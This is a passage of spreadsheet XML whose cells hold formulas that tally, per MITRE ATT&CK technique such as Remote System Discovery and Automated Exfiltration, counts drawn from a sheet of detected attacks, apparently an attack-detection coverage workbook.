        <v>3 (5)</v>
      </c>
      <c r="AN6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>3</v>
      </c>
      <c r="AO6" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>1</v>
      </c>
      <c r="AQ6" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR6" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS6" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT6" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU6" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY6" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA6" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC6" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>1</v>
      </c>
      <c r="BD6" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>1</v>
      </c>
      <c r="BE6" s="4" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF6" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>1</v>
      </c>
      <c r="BG6" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI6" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ6" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK6" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL6" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM6" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO6" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>0</v>
      </c>
      <c r="BP6" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>0</v>
      </c>
      <c r="BQ6" s="4" t="str">
        <f t="shared" si="10"/>
        <v>0 (0)</v>
      </c>
      <c r="BR6" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS6" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>0</v>
      </c>
      <c r="BT6" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>0</v>
      </c>
      <c r="BU6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>0</v>
      </c>
      <c r="BV6" s="292">
        <v>0</v>
      </c>
      <c r="BW6" s="322">
        <v>0</v>
      </c>
      <c r="BX6" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY6" s="12">
        <v>0</v>
      </c>
      <c r="BZ6" s="13">
        <v>0</v>
      </c>
      <c r="CA6" s="394">
        <v>0</v>
      </c>
      <c r="CB6" s="288">
        <v>0</v>
      </c>
      <c r="CC6" s="4">
        <v>0</v>
      </c>
      <c r="CD6" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE6" s="4">
        <v>0</v>
      </c>
      <c r="CF6" s="4">
        <v>0</v>
      </c>
      <c r="CG6" s="13">
        <v>0</v>
      </c>
      <c r="CH6" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:93" ht="15" customHeight="1">
      <c r="A7" s="4">
        <f t="shared" si="13"/>
        <v>5</v>
      </c>
      <c r="B7" s="4" t="str">
        <f>IFERROR(VLOOKUP(A7,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1018</v>
      </c>
      <c r="C7" s="493" t="str">
        <f>IFERROR(VLOOKUP(B7,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="D7" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B7)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E7" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1002</v>
      </c>
      <c r="F7" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1002)</v>
      </c>
      <c r="G7" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H7" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I7" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J7" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K7" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M7" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>6</v>
      </c>
      <c r="N7" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>6</v>
      </c>
      <c r="O7" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (6)</v>
      </c>
      <c r="P7" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>6</v>
      </c>
      <c r="Q7" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>6</v>
      </c>
      <c r="S7" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>6</v>
      </c>
      <c r="T7" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>6</v>
      </c>
      <c r="U7" s="4" t="str">
        <f t="shared" si="2"/>
        <v>6 (6)</v>
      </c>
      <c r="V7" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="W7" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>6</v>
      </c>
      <c r="Y7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>2</v>
      </c>
      <c r="Z7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>2</v>
      </c>
      <c r="AA7" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (2)</v>
      </c>
      <c r="AB7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="AC7" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>11</v>
      </c>
      <c r="AF7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>9</v>
      </c>
      <c r="AG7" s="322" t="str">
        <f t="shared" si="4"/>
        <v>9 (11)</v>
      </c>
      <c r="AH7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>9</v>
      </c>
      <c r="AI7" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>8</v>
      </c>
      <c r="AK7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>13</v>
      </c>
      <c r="AL7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>11</v>
      </c>
      <c r="AM7" s="322" t="str">
        <f t="shared" si="5"/>
        <v>11 (13)</v>
      </c>
      <c r="AN7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>11</v>
      </c>
      <c r="AO7" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>9</v>
      </c>
      <c r="AQ7" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR7" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS7" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT7" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU7" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>2</v>
      </c>
      <c r="AX7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>2</v>
      </c>
      <c r="AY7" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (2)</v>
      </c>
      <c r="AZ7" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA7" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>2</v>
      </c>
      <c r="BC7" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>8</v>
      </c>
      <c r="BD7" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>8</v>
      </c>
      <c r="BE7" s="4" t="str">
        <f t="shared" si="8"/>
        <v>8 (8)</v>
      </c>
      <c r="BF7" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>8</v>
      </c>
      <c r="BG7" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>8</v>
      </c>
      <c r="BI7" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>6</v>
      </c>
      <c r="BJ7" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>6</v>
      </c>
      <c r="BK7" s="322" t="str">
        <f t="shared" si="9"/>
        <v>6 (6)</v>
      </c>
      <c r="BL7" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM7" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>6</v>
      </c>
      <c r="BO7" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>6</v>
      </c>
      <c r="BP7" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>6</v>
      </c>
      <c r="BQ7" s="4" t="str">
        <f t="shared" si="10"/>
        <v>6 (6)</v>
      </c>
      <c r="BR7" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS7" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>0</v>
      </c>
      <c r="BT7" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU7" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B7,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>6</v>
      </c>
      <c r="BV7" s="292">
        <v>0</v>
      </c>
      <c r="BW7" s="322">
        <v>0</v>
      </c>
      <c r="BX7" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY7" s="12">
        <v>0</v>
      </c>
      <c r="BZ7" s="13">
        <v>0</v>
      </c>
      <c r="CA7" s="394">
        <v>0</v>
      </c>
      <c r="CB7" s="288">
        <v>0</v>
      </c>
      <c r="CC7" s="4">
        <v>0</v>
      </c>
      <c r="CD7" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE7" s="4">
        <v>0</v>
      </c>
      <c r="CF7" s="4">
        <v>0</v>
      </c>
      <c r="CG7" s="13">
        <v>0</v>
      </c>
      <c r="CH7" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:93" ht="15" customHeight="1">
      <c r="A8" s="4">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="B8" s="4" t="str">
        <f>IFERROR(VLOOKUP(A8,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1020</v>
      </c>
      <c r="C8" s="493" t="str">
        <f>IFERROR(VLOOKUP(B8,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Automated Exfiltration</v>
      </c>
      <c r="D8" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B8)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E8" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>26</v>
      </c>
      <c r="F8" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (26)</v>
      </c>
      <c r="G8" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>11</v>
      </c>
      <c r="H8" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I8" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (11)</v>
      </c>
      <c r="J8" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K8" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M8" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>6</v>
      </c>
      <c r="N8" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>1</v>
      </c>
      <c r="O8" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (6)</v>
      </c>
      <c r="P8" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>1</v>
      </c>
      <c r="Q8" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1</v>
      </c>
      <c r="S8" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>17</v>
      </c>
      <c r="T8" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>3</v>
      </c>
      <c r="U8" s="4" t="str">
        <f t="shared" si="2"/>
        <v>3 (17)</v>
      </c>
      <c r="V8" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W8" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>3</v>
      </c>
      <c r="Y8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>39</v>
      </c>
      <c r="Z8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>3</v>
      </c>
      <c r="AA8" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (39)</v>
      </c>
      <c r="AB8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC8" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD8" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>3</v>
      </c>
      <c r="AE8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>16</v>
      </c>
      <c r="AF8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>9</v>
      </c>
      <c r="AG8" s="322" t="str">
        <f t="shared" si="4"/>
        <v>9 (16)</v>
      </c>
      <c r="AH8" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>3</v>
      </c>
      <c r="AI8" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B8,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
